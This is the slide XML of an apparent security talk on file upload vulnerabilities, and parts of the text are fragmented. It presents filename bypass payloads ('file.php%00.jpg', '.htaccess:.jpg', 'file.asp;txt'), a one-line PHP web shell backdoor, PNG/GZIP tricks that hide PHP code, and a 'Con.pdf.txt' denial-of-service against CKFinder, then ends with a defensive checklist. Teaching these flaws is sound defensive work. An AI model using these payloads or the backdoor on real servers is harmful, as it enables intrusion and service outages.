              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:.jpg” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> make empty “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>” == “HTACCE~1” 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25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6- Null Character – S3cr3t Warr1or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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“file.php%00.jpg”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>It needs to be decoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Web server (name is in URL or code has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>URLDecode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>From client in “filename” section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Depends on server side parser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="24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945126"/>
            <a:ext cx="6826325" cy="10412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9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File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Detector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>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Height/Width of image files?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simple Example: Comments in a jpeg file:</a:t>
            </a:r>
          </a:p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2832781" cy="386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C:\Users\M6600\AppData\Local\Temp\SNAGHTML779aa9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73292"/>
            <a:ext cx="50958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Content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Format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Detecting malicious code by using a pattern?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Too many vectors and obfuscation techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>False/Positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Binary files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Different encodings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Performance issue</a:t>
            </a:r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dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>This protection method is vulnerable!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="frog2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67972" y="5157191"/>
            <a:ext cx="9525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Compression (Image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" dirty="0" smtClean="0"/>
              <a:t>)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it remove the meta-data?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Always scrambles the input?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What about small data?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious code can be produced by the compression out of dust!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source: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www.idontplaydarts.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A compressed .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file can contain PHP code!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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1083321" y="5663108"/>
            <a:ext cx="6907757" cy="947700"/>
            <a:chOff x="1048619" y="4735413"/>
            <a:chExt cx="6907757" cy="947700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rounded Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1048619" y="4747009"/>
              <a:ext cx="1728192" cy="936104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PNG Image</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/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>
            <a:xfrm>
              <a:off x="2776811" y="5215061"/>
              <a:ext cx="8640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3635896" y="4735413"/>
              <a:ext cx="1728192" cy="93610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Compression</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB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228184" y="4735413"/>
              <a:ext cx="1728192" cy="93610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PNG with PHP code!</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB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5364088" y="5215061"/>
              <a:ext cx="8640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406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GZIP Compression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PHP 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Harmless Text…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872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Gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Compression: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Now, we have a PHP backdoor:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&lt;?=$_GET[0]($_POST[1]);?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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9" y="2420888"/>
            <a:ext cx="7964313" cy="936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9" y="4077072"/>
            <a:ext cx="7963200" cy="1198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9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Name R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>andomization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about Extensions? Double Extension?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Randomization Algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Predict the names (when file is hidden)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Does it use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>riginal name?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Causing error by invalid characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Long strings can cause delays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9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Out of Web Folder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Directory Traversal to make it accessible?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remember </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FileVista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Issue?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Still can be used in LFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How will users see them?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You need to proxy them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Performance issue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local File Disclosure by a Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loading unauthorized contents/files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local/Remote file inclusion issue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And so 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9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Files In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Database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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Still can create temporary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>files</a:t>
            </a:r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In upload and download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Files in the database need more space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can lead to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What if you want to migrate to another app?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9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Logical/Programming Flaws!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File duplication issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Delay problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Good for LFI and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Special file formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compressed files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using “include” function to show an image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Replacing bad characters/extensions with nothing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>file.p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>file.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And so 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5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can hackers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/>
              <a:t>Direct File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system access and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RCE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Placing backdoors or making it more vulnerable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Exploiting Local File Inclusion issues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Exploiting server side libraries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Exploiting server side monitoring tools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Uploading phishing pages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Hosting dangerous and/or malicious files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Hosting illegal contents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Denial of Service by consuming the resources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Denial of Service by manipulating the files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="633222" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Damaging website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>reputation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6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Interesting Vectors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Apache (if we are in “/www/uploads/” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dir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 Tested in Windows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>filename = “.” or “…”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> make “/www/uploads” file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In NTFS, “…:.jpg” makes “…” file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Removable only via command line: “del *.*”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By misconfiguration, “file.jpg” can run as PHP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“/file.jpg/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”, check this too!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w3Schools Example is vulnerable!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developers use it as a base! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>O_0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>The issues are:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It uses “Content-Type” as well as the extension!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No protection for double extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Possible Cross Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross Site Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lack of authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other online examples have similar issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11887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6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w3Schools Example is vulnerable!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628799"/>
            <a:ext cx="7848872" cy="51049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1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FCKEditor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2.6.8 File Upload Issue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“.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>asptxt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” is a valid extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dangerous characters are converted to “_”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, file duplication is an exception!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thanks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mostafa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Azizi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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(@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0daynet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bug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file.asp;txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> will be saved as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>file.asp_txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>”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Again “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>file.asp;txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>”  will be saved as “file(1).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>asp;txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>”  IIS6 useless feature shines!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But, we can even use Null Character here to have “file(1).asp” on the server!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Short Demo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>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81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CKFinder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FCKEditor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Issue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There is a logical flaw in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CKFinder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>version.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uploading “Con.pdf.txt” kills the server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CKFinder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> renames an existing file to “file(1).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ext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If “file(1).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” was taken, it will try “file(2).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”, and so on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CkFinder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is OK with multiple valid extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“CON” is a forbidden name in Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CKFinder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> thinks “Con.pdf.txt” is taken,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It tries “Con.pdf(1).txt” which is forbidden too!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Con.pdf(2).txt” … “Con.pdf(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MaxInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).txt”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This can kill the server!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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checklist…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 you have enough internal and external protections?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Are they </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bypassable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>? Try it yourself!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can you host malwares, adult or illegal content for free?!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do you have a monitoring system to report newly uploaded/modified files?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Are all the libraries and modules up to date?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upload a safe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and try to see how much access it has!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25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 Managers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modules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8872" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
